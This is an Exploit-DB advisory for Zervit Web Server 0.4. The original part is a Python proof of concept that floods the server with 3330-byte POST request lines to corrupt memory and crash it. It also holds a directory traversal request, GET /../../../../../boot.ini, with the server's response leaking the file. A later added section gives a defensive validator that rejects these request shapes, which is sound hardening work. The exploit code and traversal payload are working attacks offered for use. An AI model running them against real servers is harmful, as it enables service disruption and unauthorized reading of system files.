Zervit Web Server 0.4 - Directory Traversal / Memory Corruption

EDB-ID: 8666
CVE: N/A
Platform: Windows
Published: 2009-05-13

#######################  Zervit webserver 0.4 Directory Traversal & Memory Corruption #########


By: e.wiZz! & shinnai

Site: shinnai.net & balcansecurity.com



[Memory Corruption]
########################################################################

# Python 2 proof of concept: each iteration opens a new connection and
# sends a POST request line whose target is 3330 bytes long.
import socket

host = "127.0.0.1"
port = 8080

try:
    for i in range(1, 10):
        buff = "a" * 3330
        request = "POST " + buff + " HTTP/1.0"
        connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        connection.connect((host, port))
        connection.send(request)
except:
    raw_input('\n\nUnable to connect. Press "Enter" to quit...')



[Directory traversal]
#################################################################################

[Request]

GET /../../../../../boot.ini HTTP/1.1
User-Agent: Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1
Host: localhost:80
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Connection: Keep-Alive, TE
TE: deflate, gzip, chunked, identity, trailers
#################################################

[Response]

HTTP/1.1 200 OK
Server: Zervit 0.4
X-Powered-By: Carbono
Connection: close
Accept-Ranges: bytes
Content-Type: application/octet-stream
Content-Length: 355

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /NOEXECUTE=OPTIN /FASTDETECT
##################################################
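
Added example (not part of the original advisory and not Zervit's code): a request-line check in Python that rejects both request shapes shown above, the oversized target and the "../" path, before any path reaches the filesystem. The function name check_request_line, the 2048-byte cap and the sample lines are assumptions made for this illustration.

```python
from urllib.parse import unquote

MAX_TARGET_LEN = 2048  # assumed cap; the advisory's PoC sends a 3330-byte target


def check_request_line(line, max_target=MAX_TARGET_LEN):
    """Validate a raw HTTP request line before any path reaches the filesystem.

    Returns (status, path): 200 with a normalized path relative to the
    document root, 414 for an oversized target, 400 for anything else.
    """
    parts = line.rstrip("\r\n").split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return 400, None
    target = parts[1]
    if len(target) > max_target:       # bound the length before parsing further
        return 414, None
    if not target.startswith("/"):
        return 400, None
    # Decode exactly once; the caller must use the returned path, not decode again.
    path = unquote(target.split("?", 1)[0]).replace("\\", "/")
    stack = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not stack:              # would climb above the document root
                return 400, None
            stack.pop()
        elif "\x00" in seg or ":" in seg:  # NUL, drive letters, NTFS streams
            return 400, None
        else:
            stack.append(seg)
    return 200, "/" + "/".join(stack)


# Constructed sample input: the two request shapes from the advisory,
# an encoded variant, and a benign request.
SAMPLES = [
    "POST " + "a" * 3330 + " HTTP/1.0",
    "GET /../../../../../boot.ini HTTP/1.1",
    "GET /%2e%2e/%2e%2e/boot.ini HTTP/1.1",
    "GET /docs/../index.html HTTP/1.1",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(check_request_line(s), s[:50])
```

The returned path is only safe if the server joins it to the document root as-is; decoding or normalizing it a second time reopens the traversal.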

# milw0rm.com [2009-05-13]